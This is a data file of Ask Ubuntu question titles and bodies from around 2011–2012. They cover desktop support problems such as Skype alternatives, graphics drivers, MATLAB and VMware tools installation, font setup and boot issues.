120751	is there an alternative skype client ?	i love ubuntu , but one thing i think is a pain is skype for it . it 's outdated , buggy and generally just not as smooth as a lot of the other ubuntu software . is there an alternative for it ? i 'm not speaking about another im like aim or live messenger . put another piece of software like the native app that comes with ubuntu , that allows me to sign into skype as well ? or is there perhaps a plugin for the native ubuntu chat app that allows skype contacts , calling etc . etc .
120753	tomboy notes problems during sync	i have been using tomboy notes for a while now , i sync all notes automatically in a local folder on my computer everyday . today i tried to sync it manually and it erased all my notes..luckily the backups are still intact . problem is , it still wont sync with the old backups . anybody ?
120756	could not open lock file /var/lock/aptitude no such file or directory	for all those who installed aptitude to easily search through apt on ubuntu 11+ , upon upgrading to 11.10 i am now receiving this error . [ err ] reading state information e : could not open lock file /var/lock/aptitude - open ( 2 : no such file or directory )
120758	how do i make a deb in windows ?	i need too install a broadcom sta wireless driver and since the internet does n't work without it i figured i 'll have to make a deb . how can i make a .deb in windows precisely ?
120759	how do you remove banshee 's user-level configuration settings ? ( i.e . those stored in the /home/user folders )	i have problems with banshee , and decided to remove it and re-install it , but i would like to make a complete re-installation . i used remove and purge , but still i would like to remove all user configurations left . i will appreciate any help ! thank you !
120764	trying to install ubuntu 11.10 on an old pc does not load ubuntu	i 'm not new in ubuntu , but i 'm trying to install ubuntu on another computer ( my sister 's pc ) , but when i configure bios to load from optical drive , it never loads . actually , windows loads !
120765	memory limiting solutions for greedy applications that can crash os ?	i use my computer for scientific programming . it has a healthy 8gb of ram and 12gb of swap space . often , as my problems have gotten larger , i exceed all of the available ram . rather than crashing ( which would be preferred ) , it seems ubuntu starts loading everything into swap , including unity and any open terminals . if i do n't catch a run-away program in time , there is nothing i can do but wait - it takes 4-5 minutes to switch to a command prompt eg . ctrl-alt-f2 where i can kill the offending process . since my own stupidity is out of scope of this forum , how can i prevent ubuntu from crashing via thrashing when i use up all of the available memory from a single offending program ? at-home experiment* ! open a terminal , launch python and if you have numpy installed try this : > > > import numpy > > > [ numpy.zeros ( ( 10**4 , 10**4 ) ) for _ in xrange ( 50 ) ] * warning : may have adverse effects , monitor the process via iotop or top to kill it in time . if not , i 'll see you after your reboot .
120774	is there a difference between installing an application via ubuntu software center or a terminal ?	i would like to ask a very basic question but i have never thought about it before . well , when someone installs an application from terminal , he has to add the repository first , right ? on the other side , when someone installs an application from the ubuntu software center , is the repository then added automatically ? i am asking those questions to figure out this : when i run update and then upgrade , will this application be upgraded or not ? is the result same in two options ?
120781	is it possible to set a download limit in the ubuntu software center ?	is it possible to set a download limit in the ubuntu software center ? also , is there is a way to download applications installation files for offline use ?
120784	how can i use two video cards to power three screens ?	i have two radeon 6450 graphics cards in my computer , with three screens . only the screens plugged into the first graphics card are recognized and configurable in the displays setting panel . how can i use the displays plugged into my second graphics card ? both cards are present in lspci : 01:00.0 vga compatible controller : ati technologies inc ni caicos [ amd radeon hd 6450 ] 01:00.1 audio device : ati technologies inc ni caicos hdmi audio [ amd radeon hd 6450 ] 02:00.0 vga compatible controller : ati technologies inc ni caicos [ amd radeon hd 6450 ] 02:00.1 audio device : ati technologies inc ni caicos hdmi audio [ amd radeon hd 6450 ] i 'm using the open source driver instead of the proprietary driver because the proprietary driver wo n't output 1440x2560 .
120788	how can i make an ubuntu recovery image on external media ?	i am about to expand my ubuntu partition , so i think i should make a backup of current one in case something goes wrong . is there some software to make a bootable usb and recovery image ?
120789	how to add extra_cflags to indigo eclipse cdt ?	i used the instructions here to install eclipse and the here to create an eclipse project but i suspect the instructions were written for an older version of eclipse . specifically , there is no build ( incremental build ) : build install extra_cflags+=-g ... in this version of eclipse . i have created the project without the extra_cflags and have been poking around in it looking for a place to add or set them . i see a number of things that look close in project properties but nothing that seems like a match .
120790	where to find the config-file for proftp ?	i just installed proftpd and i was wondering where i could find the configuration file , so i can set-up the server according to my wishes . i have tried /etc/proftpd.conf and /usr/local/etc/proftpd.conf , which both result ( via `` sudo gedit ( path 's from above ) '' ) in an empty document ?
120793	sony vaio randomly shuts down	i recently installed ubuntu 11.10 on a sony vaio laptop . i 'm trying to learn the linux operating system . i have a alight issue in that the computer randomly shuts down . it seems to go through the normal shutdown routine without user request . something ( and i do n't know what ) seems to be requesting the shutdown . how can i work out what is requesting this shutdown ?
120799	recover 1tb disk erased with startup disk creator	hello . i was trying to make a bootable flash drive from the startup disk creator , and when i went to erase the flash drive i accidentally erased the wrong drive , a 1tb removable drive . the operation took less than a second and gave no warning . i tried erasing the flash drive and it took about a minute , but it took but a second to erase the 1 tb drive , which is very surprising . please help , gabriel
120801	how do i install matlab r2012a ?	i have downloaded matlab r2012a for unix platform and i want to install it on my ubuntu 11.10 . to install i try this command : / < matlab_installation_file_directory > /install and it says : install : missing file operand according to it 's manual i must give it an input file , so i create an input file like this to install in 'stand alone ' mode : destinationfolder=usr/local/r2012a fileinstallationkey=xxxxx-xxxxx-xxxxx-xxxxx-xxxxx agreetolicense=yes outputfile=/tmp/mathworks_usr.log mode=interactive activationpropertiesfile=home/ ... /lic_standalone.dat acctually i 'm not sure in `` activationpropertiesfile '' field what file is required , so i supposed it requires license file . i saved this file as txt format in the same directory which installation files are . then i tried this command : install -inputfile my_input_file.txt and it gets this error : install : invalid option -- 'i' i know there is some helps in other websites and also some questions here about this topic , but i ca n't figure out what 's the problem , please help me , i 'm a real noob on linux . thank you guys update : in properties of the install file i checked the item `` allow executing file as program '' , now it 's like this : after that i can run install file by clicking on it or by typing ./install in terminal . but in both ways i get this : preparing installation files ... installing ... eval : 1 : /tmp/mathworks_xxxx/sys/java/jre/glnx86/jre/bin/java : permission denied finished in third line xxxx is a random number every time like 6370 or 5310 ... . why i have not permission ? what should i do ? update : using mahesh help i tried these commands : sudo chmod +x ./install sudo ./install -v the result is : preparing installation files ... - > dvd = /home/mehdi/qbt_dir/matlab_unix_2012a/ml2012au - > arch = glnx86 - > display = :0.0 - > testonly = 0 - > jre_loc = /tmp/mathworks_6114/sys/java/jre/glnx86/jre - > ld_library_path = /tmp/mathworks_6114/bin/glnx86 command to run : /tmp/mathworks_6114/sys/java/jre/glnx86/jre/bin/java -splash : '' /home/mehdi/qbt_dir/matlab_unix_2012a/ml2012au/java/splash.png '' -djava.ext.dirs=/tmp/mathworks_6114/sys/java/jre/glnx86/jre/lib/ext : /tmp/mathworks_6114/java/jar : /tmp/mathworks_6114/java/jarext : /tmp/mathworks_6114/java/jarext/axis2/ : /tmp/mathworks_6114/java/jarext/guice/ : /tmp/mathworks_6114/java/jarext/webservices/ com/mathworks/professionalinstaller/launcher -root `` /home/mehdi/qbt_dir/matlab_unix_2012a/ml2012au '' -tmpdir `` /tmp/mathworks_6114 '' installing ... eval : 1 : /tmp/mathworks_6114/sys/java/jre/glnx86/jre/bin/java : permission denied finished update : last thing to do is go into /matlab-install-files/sys/java/jre/glnx86/jre/bin/java and : sudo chmod +x ./java and then go back to installation files directory and run install by : ./install or sudo ./install and it will work : - ) thank you all specially `` mahesh '' and `` john ''
120820	why are some songs available on 7digital.com not available in the ubuntu one music store ?	what is the reason that some songs , which are available on 7digital.com ( my country-region ) are not available in ubuntu-one-store ? as example the last album of `` nine lashes - the intervention '' was not listed by rhythmbox ... i would like to support canonical on this way but so i have no joiz ...
120823	how do i install lubuntu without a usb or cdrom ?	the cd-rom does not work . my pc is very old and does not boot through usb . i want to install lubuntu through windows . wubi does not support lubuntu ( that is what i think ) . is there a program like wubi that can help ? can you tell me a way to install lubuntu ?
120824	check drivers from ubuntu	is there a way i can check what model my drivers are from ubuntu ? i need to see what model my lan usb adapter is.. but when i open disk utility all i see is my harddrive and a flash drive i 've inserted.. where can i go deeper and see my monitor model , my graphic card , all usb plugged in ( like keyboard , mouse , internet ) etc . ? ? thanks a lot
120828	gillsans font does n't show up in any applications	i am running ubuntu 10.04 , lucid lynx , and i 'm trying to add some fonts for use with libre office . in particular , i 've placed a gillsans.ttc font file into /usr/share/fonts/truetype by copying it there with : sudo cp gillsans.ttc /usr/share/fonts/truetype and then attempting to `` install '' it by updating the font cache : sudo fc-cache -fv that appears to complete successfully , however , the font never seems to be available to either libre office , nor fontmatrix . in addition , i tried adding the font to my .fonts directory , thinking that i was somehow seeing a cache of just user supplied fonts , but that is n't the case . the file is a .ttc file , is there some other tools i need to use to extract each font from the .ttc , or is there something else i must do to use a .ttc ? nothing appears to have any issue with the file , but it could be silently failing to do anything . i 've looked for the answer in other places , but the only time that a similar question was asked , it did not appear to be answered , so i figured i would ask the question differently and see if anyone else might be able to clue me in on how to use a .ttc font file , if that is possible . a related question , are there any tools to see what font families/font names are contained within a .ttc font file ? -- edit -- wanted to add one interesting thing : fontmatrix will see the font if i copy it to ~/.fonts and if i rename it gillsans.ttf . however , libre office still does not see the font as installed . i 'm at the `` wtf ? '' point , and am about to resort to filing some kind of bug ... but i do n't know if i should file one against libre office , ubuntu , or both .
120833	how i install drracket ?	i install drracket in ubuntu . downloaded the source file from http : //pre.racket-lang.org/installers/ and typed sudo ./racket-5.2.1-bin-i386-linux-ubuntu-karmic.sh after making it exe file so the file is in the usr/racket/bin/drracket and i want to run it from command line without going to its directory i cant make the drracket to run the .rkt files by the `` open with '' how can i make this two things ? ? ?
120837	edit boot list on ubuntu 12.04	i 'm using ubuntu 12.04 and i want to simply edit my boot list . i have done it before , but i ca n't find the article which i referred to , nor i can remember the program name which i used to edit it . the program had a proper gui for editing the list and i want to use that program to simply do some customization on the list . please help me , its urgent . : d
120842	how can i tell if a window is in fullscreen from command line	so i found that with wmctrl -f -r `` somewin '' -b add , fullscreen i can make a window fullscreen , now i want to run a cron so that it stays open , but also verifies that it 's fullscreen . is there something that can tell me if it 's fullscreen or not ? or do i have to compare the window size with the screen size . if so , with wmctrl -g -l i get the window size , but i have nothing to compare it with , wmctrl -d says 0 * dg : 2880x1800 vp : 0,0 wa : 65,24 1375x876 n/a , the resolution is 1440x900 , so none of those are it .
120849	is ubuntu studio dead ?	what the plans for ubuntu studio ? i see 11.10 is the lastest release and it is transitioning to xfce with no plans to utilize unity . the recommended release is 10.04 according to the wiki .
120850	javaws crashes , error in ld-linux-x86-64.so.2	i am running ubuntu 11.10 64 bit client as dom0 and xen . i am having problems getting java up and running . java itself seems to work fine , however i get strange errors , for example when i start javaws . i tried different versions and always get the same errors . i tried openjdk 1.6 and 1.7 as well as sunjava6 and 7 . i alway get an error in the same lib all other applications are working fine , so it seems ld-linux-x86-64.so.2 is working fine . any hints what could be wrong ? ubuntu01 : ~ $ javaws # # a fatal error has been detected by the java runtime environment : # # sigill ( 0x4 ) at pc=0x00007f4e74c5ad10 , pid=7974 , tid=139974945277696 # # jre version : 6.0_23-b23 # java vm : openjdk 64-bit server vm ( 20.0-b11 mixed mode linux-amd64 compressedoops ) # derivative : icedtea6 1.11pre # distribution : ubuntu 11.10 , package 6b23~pre11-0ubuntu1.11.10.2 # problematic frame : # c [ ld-linux-x86-64.so.2+0x14d10 ] _dl_make_stack_executable+0x2b70 # # an error report file with more information is saved as : # /home/r/hs_err_pid7974.log # # if you would like to submit a bug report , please include # instructions how to reproduce the bug and visit : # https : //bugs.launchpad.net/ubuntu/+source/openjdk-6/ # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . # aborted
120851	use adwaita dark for libre office and possibly other apps too ?	i would like to know how to force some apps to use the adwaita dark theme . i noticed by default that the movie player and photo viewer apps in gnome shell use adwaita dark while most other apps use the light variant . i would really like to set libre office to use dark instead of light . how would i go about doing this ? i found the site below , but the instructions seem a bit outdated and they do not work for gtk3 . http : //urukrama.wordpress.com/2008/07/13/setting-a-custom-gtk-theme-for-specific-applications/
120856	ubuntu 11.10- conky ( need help w/ config )	i 'm still new to ubuntu , i just downloaded `` conky '' from the command line . i found some really cool script online , but i do n't how to edit conky and copy and paste the script . thanks , -vince
120857	nvidia additional drivers empty - maximum resolution 640x480 - driver disappears	edit : optimus card . for resolution please read this thread : '' you do not appear to be using the nvidia x server '' ( screenshot included ) and this : ubuntu 11.10 problem with nvidia thanks ! i know , i know yet another nvidia question . so i did all the research . i uninstalled and installed nvidia-settings and drivers and nvidia-current from ppe repositories which are the most updated ones . i executed nvidia-xconfig . i have two major problems . one : additional drivers setting is empty ! it does n't contain any driver although one is installed . i have executed apt-get update too . but still the list is empty . two : if i execute nvidia-xconfig it will properly configure an xorg.conf file . i restart but the maximum resolution i got is 640x480 . i tried the xrandr but i ca n't add any resolution to display lvds1 . some weird error occurs . so i ca n't add a proprietary driver and i ca n't boot in with the xorg file created by nvidia ... what can i do ? with some work ( unistall nvidia-current and install libgl1-mesa-glx i was able to activate some kind of usage of my card because the resolution got better ... and i added bumbelbee to because i have multiple video cards ... ) but still the list is empty . i do n't know what to do at this point ? ? ! ! ! also : this is the most important part . when i first installed my ubuntu yesterday 11.10 one i saw the driver ! ! the driver was there ... and then i ofc updated every package from internet.. and after that it was gone . and i ca n't bring it back . so there must be something wrong with one of the updates . but which ? ? ? ? thanks for any extra info you can provide ! i 'm really desperate to solve this issue .
120858	ubuntu 11.10- wine ( understanding wine )	i 'm new to ubuntu , i just downloaded `` wine '' from the command-line . so when and open up `` wine '' , i have no idea what i 'm suppose to do next . what do i do after the download had been completed..open it , then what ? let 's say i want to download ms office 2010 ( using a disc , will it automatically download it ) ? thanks , -vince
120866	can not set monitor to native resolution	problem is similar to so many other users , but solutions found do not work . background : fresh install of 12.04 ( completely updated ) on a fit-pc2 ( specs ) . read in several places that the new 3.x kernel that 12.04 runs on has a new psb_gfx driver which supports the gma500 graphics card ( poulsbo chipset ) . all 's pretty much working ( there are some glitches which are documented , so i wo n't raise them here ) , except for the screen resolution . my native monitor resolution is 1920x1080 , but all i get is 1024x768 . output running xrandr : xrandr : failed to get size of gamma for output default screen 0 : minimum 1024 x 768 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0* although i read that ubuntu does not come with an xorg.conf file anymore , i also tried running sudo x :1 -configure , and here 's the end of the output : number of created screens does not match number of detected devices . configuration failed . when i look in the xorg.conf.new file created in my home directory , it seems that for some reason x thinks i have two screens . do n't know what to do with that . ideas anyone ? thanks for your time .
120868	5 seconds image intro with ffmpeg	i have one mp3 song song.mp3 and 2 jpg files 1.jpg 2.jpg now , i want to make video from mp3 with jpgs as a background , but in a way so that 1.jpg streams for first 5 seconds then 2.jpg till the rest of the song . this is not working ffmpeg -i 1.jpg -t 5 -loop_input 2.jpg -i song.mp3 -shortest -acodec copy video.flv i know there is a way to do it when you get length of the song , but prefered way would be without knowing the length , if it exists .
120873	kernel module compilation fails when installing vmware tools	when i install wmware tools , i get this error for vmhgfs : /tmp/vmware-root/modules/vmhgfs-only/filesystem.c:47:28 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . compilation terminated . make [ 2 ] : *** [ /tmp/vmware-root/modules/vmhgfs-only/filesystem.o ] error 1 make [ 1 ] : *** [ _module_/tmp/vmware-root/modules/vmhgfs-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.0.0-12-generic' make : *** [ vmhgfs.ko ] error 2 make : leaving directory `/tmp/vmware-root/modules/vmhgfs-only' if you wish to have the shared folders feature , you can install the driver by running vmware-config-tools.pl again after making sure that gcc , binutils , make and the kernel sources for your running kernel are installed on your machine . these packages are available on your distribution 's installation cd . and /mnt/hgfs is empty when sharing . if i run vmware-hgfsclient in a terminal , i get the list of shared folders but /mnt/hgfs is empty . i try to new version of vmware tools with vm machin but it very slowly and during the download is interrupted . can you give me link for tar.gz file ?
120876	windows 7 professional wo n't boot after installing ubuntu 11.10 alongside	i ca n't boot into windows 7 professional after installing ubuntu version 11.10 alongside windows as a dual boot . windows starts to boot after i select it from grub and then select `` start windows normally from the error screen but then it stops during start up animation and `` crashes '' and reboots . i do not have an installation or repair disc for windows and windows is not registered as i built the computer in a class . i do not know if it is legit because of before mentioned reasons . please help anybody who is familiar with ubuntu . optimally i would like to just uninstall ubuntu altogether and have windows 7 as my sole os . specs : os : windows 7 professional x64 , ubuntu/unity 11.10 ; cpu : intel celeron 2.6 ghz 64 bit ; 2 gb of ram ; built in september or october 2011 . offline . homebuilt desktop pc . details : after selecting windows from gnu grub version 1.99-12ubuntu5 it displays : windows error recovery windows failed to start . a recent hardware or software change may be the cause . if windows files have been damaged or configured wrong , startup repair can help diagnose and fix the problem . if the power was interrupted during startup , choose start windows normally . launch startup repair ( recommended ) start windows normally after i select launch startup repair it displays ( after similar heading ) : 1 . insert installation disc and restart your computer . 2 . select your language and click next . 3 . click repair . if you do not have a repair disc contact your system adminisrator or manufacturer for assistance . status : oxcooooooe info : boot failed because a required directory is missing . well , i 'm the administrator and manufacturer so i 'm kind of sol . update : i found an iso for my version of windows here and will try making an installation disc next time i go to the library . i hope it works and i will update if it does . i can always try to contact microsoft .
120879	errors were encountered while processing : linux-image / headers / generic	i tried to update my machine through the update manager and found some errors . first , before i get to the problem , i feel i should mention that my os ( 10.04 ) is mounted on a portable hdd that boots using unetbootin . ( i take it with me around campus and `` borrow '' the universities hardware , it 's much lighter than a laptop . ) when i update through the update manager i get the following : dpkg : error processing linux-headers-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-2.6.32-40-generic linux-image-2.6.32-41-generic linux-headers-2.6.32-33-generic linux-headers-2.6.32-40-generic linux-headers-2.6.32-37-generic linux-image-generic linux-image-2.6.32-33-generic linux-headers-2.6.32-41-generic linux-generic linux-image-2.6.32-37-generic linux-headers-generic i 'm not sure what to do . any help would be awesome !
120883	failed to create a new virtual machine	i am really new in linux and i want to set up a virtualbox vm with windows . my problem is that it returns this message when i create it : failed to create a new virtual machine . machine settings file '/home/george/virtualbox vms/george/george.vbox ' already exists
120892	ubuntu 10.04 lts minimal requirements ( special )	i have a pc with 512mb of ram , an intel pentium 4 processor ( 2ghz ) , sis 651 video card ( 32mb ) and a sis c-media ac'97 sound controller . i know that my video card is not and will not be supported for linux . but i wonder if my pc is able to install and start ubuntu , not just 10.04 lts , because i 'm willing to download 12.04 lts when it 's released . will unity work ? i searched on the internet but i could n't find a good answer .
120898	removing the splash screen on shutdown an startup . i want to be able to see the processes ( xubuntu 11.10 )	i know this has been asked but on slightly different terms . i would like to remove it so that i can see the code behind . not one off but every time it is shutdown and started . thaknk you in advance .
120910	can not change audio output for chromium or firefox	i can change my audio output to my headphones in the audio settings , and it changes for every program except for chromium and firefox . no matter what i change my audio output to , chromium and firefox still use my speakers , which i do not want to use , i want to use my headset .
120914	what is the label directory to scan hard drive for viruses ?	i just downloaded avg antivirus for my pc with linux on it . i was wondering how to find the directory label for the hard drive . i found a page that said that `` blkid '' was for scanning usb devices . is there a label for hard drives ? any other specific instructions would be nice . thanks .
120925	can i invoke 'make ' from kate ?	in vim i can invoke ' : make ' , which starts make , and if there are errors , it opens the file at the line where the error was . is there something similar in kate ? i 've found a 'focus terminal ' command , but it just opens a terminal , and i am specifically looking for the feature where the text editor goes to the lines where there are errors .
120928	what is the mod4+d shortcut key ?	in system/preferences/keyboardshortcuts there is a shortcut key called mod4+d that can be used to minimize windows . how is mod4+d entered on a keyboard and what is the meaning of the mod4 ?
120929	upgrade the distribution , or reinstall the system ?	12.04 is coming soon , and i was wondering whether it is better to upgrade or completely reinstall the system . my home is in different partition from the rest , so complete reinstall would be easy to do . so , are there any differences between upgrading the distribution and reinstalling the system* ? * assuming the same packages are selected during reinstall .
120932	how do i covert videos for a nokia mobile using arista transcoder ?	i am new in ubuntu and need some help . i have 11.04 installed how do i covert videos for a nokia mobile using arista transcoder ? specifically , i need my videos to be compatible with my nokia 5xxx
120936	virtual machine using natively installed windows	i have windows installed on my pc , and sometimes i would like to run it under ubuntu , is it possible ?
120939	ubuntu 11.10 login loop	unity login return to login screen again after successful login . got the following error in ~/.xsession-errors /etc/gdm/xsession : beginning session setup setting im through im-switch for locale=en_us start im through /etc/x11/xinit/xinput.d/all_all linked to /etc/x11/xinit/xinput.d/default window manager warning : fatal io error 11 ( resource temporarily unavailable ) on display ' : ' tried all the solutions using gdm instead of lightgdm system upgrade xsession errors
120951	file sync is disconnected problem with ubuntuone	i 'm looking to upload a file to my ubuntu one cloud , but when i open the ubuntu one control panel on my ubuntu 12.04 machine , it notifies me that `` file sync is disconnected . '' so , naturally , i 'll click the `` connect '' button next to it , and it will say `` file sync in progress ... '' and it will want to upload my file , but it does n't seem like anything is happening . then , after a minute , it will simply regress into `` file sync is disconnected . '' this , of course , frustrates me greatly , and causes me to wonder , what could i possibly be doing wrong ? i have already tried u1sdtool -q , u1sdtool -- status , and u1sdtool -- start the status report is : > u1sdtool -- status state : waiting connection : with user with network description : waiting before try connecting again is_connected : false is_error : false is_online : false queues : working although i am able to add or remove devices from both web service as well as ubuntuone on my desktop running ubuntu 12.04 ( beta ) .
120953	exact field meaning of /proc/stat	everyone i need to know the exact meaning of every field in /proc/stat file . i read man proc and it only lists several common fields in various architecture and i find in ubuntu , it includes several other fields in cpu row . the below is output in my system and cpu rows contain up to 10 columns while the manual only gives 8 column definitions . furthermore , i ca n't match the order of columns between my output and the manual . cpu 606833 402 200307 3888129 69330 0 2702 0 18958 0 cpu0 305810 176 95771 1937157 42348 0 2581 0 9824 0 cpu1 301023 226 104535 1950972 26982 0 121 0 9134 0 intr 52047763 122 2 0 0 0 0 0 0 1 0 0 0 0 0 0 0 1134857 0 0 444732 0 0 0 307878 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 52 8016227 602 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ctxt 91496615 btime 1334106197 processes 27829 procs_running 1 procs_blocked 0 softirq 8764373 0 5353481 964 133618 444766 0 560785 671622 2332 1596805 thanks
120955	are there keylogger viruses that affect ubuntu ?	i just within the last few hours had my amazon and gmail accounts hijacked . purchases were made through my amazon account that i did n't authorize ... in fact , i was n't even in my room . according to gmail , the ip address of when i got hijacked was where i live . enough rambling , here 's my question : are there keylogger viruses on ubuntu ? i am not sure if either i accidentally let my password out there somewhere , or maybe i have a keylogger . i 'm currently installing clamav to scan for viruses . any help would be absolutely appreciated .
120958	inconsistency between date-time in terminal and clock	i ca n't figure out why i have 5 hours difference between gui clock and date command in terminal . my bios clock is set to gmt ... any ideas ? franck @ franck-thinkpad-t61 : ~ $ date mercredi 11 avril 2012 , 02:48:47 ( utc-0500 ) franck @ franck-thinkpad-t61 : ~ $ sudo dpkg-reconfigure tzdata current default time zone : 'europe/paris' local time is now : wed apr 11 09:49:02 cest 2012 . universal time is now : wed apr 11 07:49:02 utc 2012. franck @ franck-thinkpad-t61 : ~ $ tail /etc/timezone europe/paris franck @ franck-thinkpad-t61 : ~ $ date mercredi 11 avril 2012 , 02:49:21 ( utc-0500 ) franck @ franck-thinkpad-t61 : ~ $ sudo dpkg-reconfigure -- frontend noninteractive tzdata current default time zone : 'europe/paris' local time is now : wed apr 11 09:49:27 cest 2012 . universal time is now : wed apr 11 07:49:27 utc 2012. franck @ franck-thinkpad-t61 : ~ $ date mercredi 11 avril 2012 , 02:49:30 ( utc-0500 ) franck @ franck-thinkpad-t61 : ~ $ sudo cat /etc/default/rcs # # /etc/default/rcs # # default settings for the scripts in /etc/rcs.d/ # # for information about these variables see the rcs ( 5 ) manual page . # # this file belongs to the `` initscripts '' package . tmptime=0 sulogin=no delaylogin=no utc=yes verbose=no fsckfix=no franck @ franck-thinkpad-t61 : ~ $ sudo hwclock -- show mer . 11 avril 2012 07:49:48 cdt -0.555705 secondes
120966	how to install boinc at /home	i was wondering how can i install boinc at /home folder . i have an ssd for root and /home on a hdd . since boinc does lot of write/read i would like to avoid installing it on my ssd ( which i already did via muon ) . i have trim enabled and working but i would still like to get it on my hdd . do i have to uninstall/reinstall boinc and if yes how do i install it at /home folder ? thanks in advance : )
120967	what is the user-level command to suspend	( this was previously asked , but the solution no longer works under 11.10 . ) in ubuntu 11.10 any user can suspend the machine from the power menu in the top right of the screen without needing root privileges . how can i suspend as a normal user from a command line ?
120968	how do i get a lexmark x2600 printer working ?	i ca n't get my lexmark x2600 printer working . i tried a lot of things find over the net but without any success . is there a really big brain who can help me ? i really love 12.04 release ( 64 bits ) and i need my printer working .
120971	can i get inverted ( i.e . mac-like ) scrolling on my touchpad ?	i have two-finger scrolling enabled on my touchpad . moving my fingers up scrolls up and moving them down scrolls down . i would like to have the direction of scrolling inverted , in much the same way the mac does it . can i do this ? how ?
120972	help with ubuntu 11 mis-displays	so , i sea this tutorial , and i exectued this line in my terminal : sudo add-apt-repository ppa : lubuntu-desktop/ppa & sudo apt-get install lubuntu-desktop and my left-side panel changed abit , while the dash home changed to become like so : http : //i43.tinypic.com/2vuc0lj.png ! help ! how can i change to the ubuntu default style or ppa ! because whene i run this : sudo add-apt-repository ppa : ubuntu-desktop/ppa it gives me the follwing notice : gpg : requesting key a1231595 from hkp server keyserver.ubuntu.com gpg : key a1231595 : `` launchpad ppa for ubuntu desktop '' not changed gpg : total number processed : 1 gpg : unchanged : 1 does this mean that the ubuntu ppa is n't changed or what ? ? please , help any help would very appreciated : )
120973	how do i start vnc server on boot ?	how do i create a system-wide autostart file ? this would be on a cloud server running the desktop version of maverick . i logged in as root and created an autostart file using system/preferences/startupapplications but it ended up in /root/.config/autostart and did not execute ( as far as i can tell ) upon rebooting . the autostart file is to invoke a bash script that invokes the vnc server . i copied the .desktop autostart file from /root/.config/autostart to /etc/xdg/autostart and rebooted . this did not seem to make a difference . edit as mentioned in a comment , the objective is to run my bash script which starts the vnc server upon boot ; not upon a login .
120975	symbols not shown in taskbar	i use ubuntu 11.04 . in my taskbar no extra symbols are shown like for skype or vuze but instances still run in background ( ps -e in terminal shows them ) . how can i fix this problem ?
120977	what is the maximum resolution of external display for dell vostro 500 ?	i want to buy a new display for work with code . i look into dell ultrasharp u2312hm . this display have 1920x1080 resolution . and i worry about will be it work with my dell vostro 500 laptop ? may be somebody have had some expirience at it . my dell vostro 500 : core 2 duo t7300 , gma x3100 with gm965 , vga port . p.s . sorry for my english . i 'm working at it ; )
120982	placing newly opened windows while having a window maximized ?	i 'm often working in a maximized window from which i 'm opening new windows , that do not appear maximized . they are placed at the very top at the desktop in the way that i can not see the upper window decoration . the upper dock of the maximized window is in front of it . this is very unhandy , because i can not easily close or move the newly opened window . is there a way to fix this behaviour ? i played around with the place windows plugin in compiz but it did n't work at all . greetings , wauzl
120986	how do i set up my facebook account in pidgin ?	can anyone provide me a walkthrough of how to set up facebook on pidgin ?
120987	why does my graphics settings not show my graphics driver and experience values ?	i just installed precise beta on my laptop ( compaq presario cq71 ) which has an intel mobile 4 series chipset graphics card . under settings - > details - > graphics , it shows : driver : unknown experience : standard i can confirm that i am actually running unity 3d through this q & a : am i using unity or unity 2d ? my question is , why does the graphics settings not show my driver or my 'experience ' ? following what i have seen elsewhere , here is the output of /usr/lib/nux/unity_support_test -p : opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri mobile intel速 gm45 express chipset x86/mmx/sse2 opengl version string : 2.1 mesa 8.0.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes futhermore , lsmod shows the following line : video 18907 1 i915 if that means anything .
120989	how do i run warcraft frozen throne ( dota ) ?	i am using linux for the very first time and i have one question . dunno if it will be answered , but i hope so.. i have fujitsu ah 530 with intergrated video card ( intel hd ) so can i play my fav game on linux ? and how to do it ? i installed it via wine , but when i am starting the game with it , the game windows shows soooo poor , its unplayable , i can take i screenshot . here 's a screenshot of what i 'm experiencing :
120991	pidgin , invisible ... .but to everyone ? can it be customized ?	i was wondering if msn can be customized in piding ? i mean i am invisible ... .but to everyone , i simply can not figure out how to be invisible only to certain people or groups . any ideas ? thanks .
